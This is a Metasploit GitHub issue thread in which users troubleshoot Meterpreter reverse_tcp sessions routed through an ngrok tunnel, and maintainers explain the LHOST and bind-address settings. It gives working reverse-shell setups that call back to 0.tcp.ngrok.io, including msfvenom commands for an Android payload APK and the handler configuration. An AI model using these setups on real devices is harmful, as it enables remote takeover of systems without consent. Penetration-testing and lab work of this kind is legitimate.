Metasploit-framework: Post Exploitation on Meterpreter through NGROK

Created on 16 Jan 2018  路  12Comments  路  Source: rapid7/metasploit-framework

Steps to reproduce

  1. I started a tcp tunnel l on port 4444 by NGROK tcp 4444
    Now NGROK gives me a tunnel 0.tcp.ngrok.io:157xx
  2. Then I ping 0.tcp.ngrok.io to get the IP
  3. then I created a x64/Meterpreter payload with lhost as IP of NGROK tunnel and lport as the port to tunnel and executed on my machine which was connected to internet via 4g Mobile hotspot.

What happens is that when the payload is executed it connects to the NGROK tunnel which opens at the port 4444 of localhost. So at last Meterpreter reaches to my machine.

  1. Now I used payload windows/x64/Meterpreter/reverse_tcp and lport 4444 lhost 0.0.0.0 and run
  2. After 10 sec of execution I received session.
  3. Now the thing is that I am local user with no privileges.

The victim machine is a Windows 7 VM and quick heal installed.
Now I cannot kill av untill and unless I gain privileges. But none of local privilege escalation works.
Because they are meant to run locally or in case remotely but in my case if I want a post Exploitation module to work .

For example let's say I am using post/windows/local/ask
So it wants me to set current SESSION
I set it to SESSION 1
now if I run I can't get session because there is no tunnel in between the networks. I don't have a router so I can't port forward that way.

I do my things through my mobile hotspot

OS

Kali Linux 2017.3

picture X3eRo0

Most helpful comment

You need to set the LHOST to 0.tcp.ngrok.io, and LPORT to 157xx on both the payload and the handler.
Then use set ReverseListenerBindAddress 127.0.0.1 and ReverseListenerBindPort 4444 on the handler.

picture timwr on 16 Jan 2018
2 😄2

All 12 comments

You need to set the LHOST to 0.tcp.ngrok.io, and LPORT to 157xx on both the payload and the handler.
Then use set ReverseListenerBindAddress 127.0.0.1 and ReverseListenerBindPort 4444 on the handler.

timwr picture timwr on 16 Jan 2018
2 😄2

First of all Thank you Very Much for your time to reply and solve my problem.
I will try your solution as soon as I can go back to my lab thank you again.
I appreciate the support your support

X3eRo0 picture X3eRo0 on 16 Jan 2018

We have to find a way to make this LHOST issue more publicly visible. It's documented here but that's in the depths of the wiki.

@busterb do you think we should create a "COMMON MISTAKES" wiki page that's really easy to find and shoving it in there?

OJ picture OJ on 16 Jan 2018

Stop allowing 0.0.0.0 for bind address? Or throw a big fat error if we send a stage out with 0.0.0.0 that tells the user what they did wrong? Maybe the problem isn't documentation but that we allow the user to shoot themselves in the foot with the default settings.

busterb picture busterb on 16 Jan 2018

Yeah I think if LHOST is set to anything that maps to localhost or 0.0.0.0 then we should at least throw a warning?

OJ picture OJ on 16 Jan 2018

We do currently warn on 127.0.0.1. Maybe expand what to warn on, although when a port is already used we fallback to 0.0.0.0 so might need to adjust that behavior too.

jmartin-r7 picture jmartin-r7 on 16 Jan 2018

The fallback on bind is absolutely fine, it's the setting of LHOST (and therefore the config that goes out with metsrv) that's the issue.

+1 to expanding on the warning when LHOST points to the entire Internet :)

OJ picture OJ on 17 Jan 2018

0.0.0.0 is only half of the internet :)

busterb picture busterb on 17 Jan 2018

Okay Thanks now I will use my local IP okay 192.168.43.xxx. since NGROK opens tunnel from 0.tcp.ngrok.io with port 157xx to the localhost of machine where NGROK is running, so there was no problem in getting a stable session for first time. Next time is where problem starts thank you all to guide me.

X3eRo0 picture X3eRo0 on 17 Jan 2018

:cake:

wvu-r7 picture wvu-r7 on 17 Jan 2018

This is what I have been doing
https://youtu.be/7ICmUdsNTuM

X3eRo0 picture X3eRo0 on 17 Jan 2018

I created the payload using msfvenom and ngrok as
follows
ngrok tcp 4444
msfvenom -p android/meterpreter/reverse_tcp
LHOST=0.tcp.ngrok.io LPORT=1** R>test.apk
for the handler I used
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
exploit -j
after this I get a meterpreter session but it only shows the core commands when I type help; all other commands
are missing including android commands.... I also tried generating
the payload using fatrat but I end up getting the same result!
please help! Please help!

kaluabd picture kaluabd on 19 Oct 2018
Was this page helpful?
0 / 5 - 0 ratings

Related issues

Acidical picture Acidical  路  3Comments
miholtz picture miholtz  路  3Comments
handsomebeast picture handsomebeast  路  3Comments
ejholmes picture ejholmes  路  3Comments
notdodo picture notdodo  路  3Comments